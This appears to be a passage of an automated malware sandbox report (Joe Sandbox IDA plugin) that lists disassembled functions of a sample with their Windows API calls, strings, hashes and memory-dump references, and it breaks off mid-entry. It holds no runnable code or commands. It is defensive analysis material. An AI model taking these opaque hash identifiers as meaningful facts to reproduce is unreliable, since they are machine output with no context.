Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __itow_s
String ID: xbn$xbn
API String ID: 3653519197-2846253748
Opcode ID: c86ab429b53264f03cde027c5dc55d6f0d55173b39fcaeacf77b2bcb22ed0140
Instruction ID: c4c9bb6d3c7ba5db7ebc41e97583e0dcba568733e2a3bea11b68bb0a16505638
Opcode Fuzzy Hash: c86ab429b53264f03cde027c5dc55d6f0d55173b39fcaeacf77b2bcb22ed0140
Instruction Fuzzy Hash: 9EB17C70A00209AFCF24DF54D990DFABBBAEF58310F148459F9459B691EB30E981CBA4

Function 0068AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0063FC86: _wcscpy.LIBCMT ref: 0063FCA9

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

__wcsnicmp.LIBCMT ref: 0068B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0068B0F6

Strings

LPT, xrefs: 0068B027

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: f620d477101791084b65d34229d68205f9fd5b979e82e8b5b678fe3b5bd90e4c
Instruction ID: f6388e122f2b589770988acb413aa98ccf1d34edbcba81f855536be0744f5309
Opcode Fuzzy Hash: f620d477101791084b65d34229d68205f9fd5b979e82e8b5b678fe3b5bd90e4c
Instruction Fuzzy Hash: F361B171A00218AFCB14EF94C895EEEB7B6EF09310F004169F956AB391D770AE40CB94

Function 00632957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00632968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00632981

Strings

@, xrefs: 00632975

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: d84a9ea19e5ef4c967144a8fc9fbcb83e61458c393a0d826e779081074577a55
Instruction ID: dde2ff8374fb69fc416a5317158e5a2704bf1fec27c4ce8c194d0d15dd49661b
Opcode Fuzzy Hash: d84a9ea19e5ef4c967144a8fc9fbcb83e61458c393a0d826e779081074577a55
Instruction Fuzzy Hash: 47513771419B549BD360EF10EC86BABBBE9FF85354F42885DF2D8410A1DF308529CB6A

Function 00689734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00624F0B: __fread_nolock.LIBCMT ref: 00624F29

_wcscmp.LIBCMT ref: 00689824
_wcscmp.LIBCMT ref: 00689837

Strings

FILE, xrefs: 00689770

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 61c3b449ec9e9e2eafcc0f802ecf3c7b9ce5c249142ba87d7ce1f7277327d292
Instruction ID: 960a7df8d0c9d0c2a80d7e65c854aa4396cefedac4d35b9794db07fe4f1103ef
Opcode Fuzzy Hash: 61c3b449ec9e9e2eafcc0f802ecf3c7b9ce5c249142ba87d7ce1f7277327d292
Instruction Fuzzy Hash: 9641C671A0021ABADF20AEA0DC45FEFBBBEDF85710F010569F904B7281DA719A058B65

Function 00660574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0066057F

Strings

Ddn, xrefs: 0062A317
Ddn, xrefs: 0062A151

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClearVariant
String ID: Ddn$Ddn
API String ID: 1473721057-1796732413
Opcode ID: f018db4f961cc982a05f206d956900f5ce3bb7e98d13748a1d259e2c8e95c64f
Instruction ID: 10b6821be118c824b6558f80a101e9721e8feb38da7c3bde4e4cd27f1d85794d
Opcode Fuzzy Hash: f018db4f961cc982a05f206d956900f5ce3bb7e98d13748a1d259e2c8e95c64f
Instruction Fuzzy Hash: B5511E78A09752CFD754CF18D580A5ABBE2BB98390F54881CF8818B361D371E882CF82

Function 0069258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006925D4

Strings

|, xrefs: 006925A5

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 8e1d1e4d8080154a54287c7a1d35684467b07ea46a03d4f35a144236da6ea22b
Instruction ID: 842227290ab8c815a59f750e515dc45ea471a98bc2caf796e645ddf8e3c55e3d
Opcode Fuzzy Hash: 8e1d1e4d8080154a54287c7a1d35684467b07ea46a03d4f35a144236da6ea22b
Instruction Fuzzy Hash: A631087180011AABCF51EFA1DC95EEEBFBAFF08310F100059F915A6262EB315956DF64

Function 006A7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 006A7B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006A7B76

Strings

', xrefs: 006A7ACA

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 79f05d84e6926159c52512b144c503c8d8fffd1357e3afa6cf996b561ba1f8a6
Instruction ID: 11403f5d190c1671daf87278c93a9ee66ade9b5845ee7f71038157f486f6b933
Opcode Fuzzy Hash: 79f05d84e6926159c52512b144c503c8d8fffd1357e3afa6cf996b561ba1f8a6
Instruction Fuzzy Hash: 4D410774A0530AAFDB14DF64C981BEABBB6FB09300F10016AEA05AB351D771AD51CFA0

Function 006A6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 006A6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006A6B53

Strings

static, xrefs: 006A6AB3

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 826fa40ada8514dea1e24eba98cf1c9359b2e3756e5dbeddd315c35fb29680bb
Instruction ID: 958a1413d8c28a273edbb630f7493d1806a6101514c372ebfdc7144b5e416058
Opcode Fuzzy Hash: 826fa40ada8514dea1e24eba98cf1c9359b2e3756e5dbeddd315c35fb29680bb
Instruction Fuzzy Hash: 39319071100604AEDB10AF64DC80BFB73AAFF49760F14961DF9A5D7190DA31AC91CB74

Function 006828A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0068294C

Strings

0, xrefs: 0068290A

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 65ba5ecd5f269a626e09bf15627036fe0437349e9f4d1391fab278d819bc171f
Instruction ID: 8bf09254cb6e08762f3f9cfc660b6718a86d58f1b83ea4740da5c281c79fec13
Opcode Fuzzy Hash: 65ba5ecd5f269a626e09bf15627036fe0437349e9f4d1391fab278d819bc171f
Instruction Fuzzy Hash: 7431D531A00307AFEF24EF5AC995BEEBBF6EF45350F140229E985A62A0D7709944CB51

Function 006A66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006A6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006A676C

Strings

Combobox, xrefs: 006A672E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 038ca9327621da2009b5890a058716f6c5068481ff86d61d265ca46acb2567ca
Instruction ID: f9fc4f96ca8793f3bcdcd513b5112de77a237672c0671829458be8d06e64948f
Opcode Fuzzy Hash: 038ca9327621da2009b5890a058716f6c5068481ff86d61d265ca46acb2567ca
Instruction Fuzzy Hash: 6111B275210208AFEF11AF64CC80EFB376BEB4A368F150129F9149B3A0D671DC918BA0

Function 006A6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00621D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00621D73
Part of subcall function 00621D35: GetStockObject.GDI32(00000011), ref: 00621D87
Part of subcall function 00621D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00621D91

GetWindowRect.USER32(00000000,?), ref: 006A6C71
GetSysColor.USER32(00000012), ref: 006A6C8B

Strings

static, xrefs: 006A6C4E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: caa1638e0bb22a90687f5930b64b327c03766adfebee613a402feb9d1b187d72
Instruction ID: 7c22c17c1cf15139396458bed4d3b5eaec791c5f7d12118f0bd36e06b0ad6f1a
Opcode Fuzzy Hash: caa1638e0bb22a90687f5930b64b327c03766adfebee613a402feb9d1b187d72
Instruction Fuzzy Hash: AC215972510219AFDF04EFB8CC45AFA7BAAFB09314F045628F996D2250D635E851DF60

Function 006A6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 006A69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006A69B1

Strings

edit, xrefs: 006A6986

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 7f5227244ec2626a58b5a5d5fd9c27f5332308b60516fe3e285f9c5653b7458d
Instruction ID: c6821b60f26cf45f58855058c1b7fedd0cf22557d580b5bdf6e46da95f87c0a7
Opcode Fuzzy Hash: 7f5227244ec2626a58b5a5d5fd9c27f5332308b60516fe3e285f9c5653b7458d
Instruction Fuzzy Hash: BE116D71500205ABEB10AF64DC44AEB376BEB16374F544728F9A5962E0C771EC519F60

Function 006829AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00682A41

Strings

0, xrefs: 00682A18

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5f92f8fa45e51d338b3863f2206df91a6f3b0b0019fe2e8cb582feff3344dcde
Instruction ID: de77e7888ccb46a6fad09d0570386a4fa2569f99fa0f0eb84d70b7d2872eca67
Opcode Fuzzy Hash: 5f92f8fa45e51d338b3863f2206df91a6f3b0b0019fe2e8cb582feff3344dcde
Instruction Fuzzy Hash: 6E11D036901216ABCF38FB98D994BEA77ABAF45304F144225E855EB390D730AD0AC791

Function 006921D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0069222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00692255

Strings

<local>, xrefs: 0069221D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 35db7753824c1cf1b11e9795588d957ea1593f3ff6fbc738c26dc67a7ffa3174
Instruction ID: 5687a97a25d14d774997a3d928c3f4105ba589b0a45c7f835b54e99180a261bb
Opcode Fuzzy Hash: 35db7753824c1cf1b11e9795588d957ea1593f3ff6fbc738c26dc67a7ffa3174
Instruction Fuzzy Hash: 0E110670541226BADF289F518CA4EF7FBAEFF06751F10822AF50486900D3706A91D6F0

Function 0063092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00623C14,006E52F8,?,?,?), ref: 0063096E

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

_wcscat.LIBCMT ref: 00664CB7

Strings

Sn, xrefs: 006309AE

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: Sn
API String ID: 257928180-3752711764
Opcode ID: 244ea4ad94621b9b58c3f13821ef1ee6f7deeaaf8b223e37e76a2410596d5827
Instruction ID: d3461c3589604dbdfb50ba40b2ae3a1e2a52547969d028d7ba794727bb0d49e0
Opcode Fuzzy Hash: 244ea4ad94621b9b58c3f13821ef1ee6f7deeaaf8b223e37e76a2410596d5827
Instruction Fuzzy Hash: F611E530E017189B9B80FFA0D811FCD77ABAF08341F0054A9B945D72D1EAB0AA884B55

Function 00678E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Part of subcall function 0067AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0067AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00678E73

Strings

ComboBox, xrefs: 00678E12
ListBox, xrefs: 00678E3D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: ae098539e0d616cd32f33251dfaf43b001c4d8b28acd59d34a0b0a9cfa904c04
Instruction ID: 8f9728340c9a852a7d1b33bd0f2ebe9b35fb423f3083deba1b1e140820d8b9bd
Opcode Fuzzy Hash: ae098539e0d616cd32f33251dfaf43b001c4d8b28acd59d34a0b0a9cfa904c04
Instruction Fuzzy Hash: 2001B571A41629AB8B14EBA4CC55CFE736BAF46320B144A1EF826573E1EF315C08DA51

Function 00678CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Part of subcall function 0067AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0067AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00678D6B

Strings

ComboBox, xrefs: 00678D0A
ListBox, xrefs: 00678D35

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: b65df77ad5a8d3c4eb7196d41931bebf8d94cd3bcaf0a5f52e6b511b57a52bb1
Instruction ID: 6a4e44b3d52f0a58433b242787a21e27e571ee46e6b35e6819e048a36eaccd40
Opcode Fuzzy Hash: b65df77ad5a8d3c4eb7196d41931bebf8d94cd3bcaf0a5f52e6b511b57a52bb1
Instruction Fuzzy Hash: 5C01FC71B41518ABCB24E7E0C956EFE77AEDF15340F10401E7406632D1DE215E08D675

Function 00678D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Part of subcall function 0067AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0067AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00678DEE

Strings

ComboBox, xrefs: 00678D8F
ListBox, xrefs: 00678DBA

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 44bd4449c3750e681864135846890bae0650baaf3f172ff99e6ac1f41993dcba
Instruction ID: f21d3ba86c22f2d7bfde2b3b2eed5650eaa9649609b06403e85c49e3fc239f6f
Opcode Fuzzy Hash: 44bd4449c3750e681864135846890bae0650baaf3f172ff99e6ac1f41993dcba
Instruction Fuzzy Hash: 47012B71A81118BBCB25E7E4C946EFEB7AECF12300F10401AB80A632D1DE214E09DA76

Function 0067C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0067C534

Part of subcall function 0067C816: _memmove.LIBCMT ref: 0067C860
Part of subcall function 0067C816: VariantInit.OLEAUT32(00000000), ref: 0067C882
Part of subcall function 0067C816: VariantCopy.OLEAUT32(00000000,?), ref: 0067C88C

VariantClear.OLEAUT32(?), ref: 0067C556

Strings

d}m, xrefs: 0067C517

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
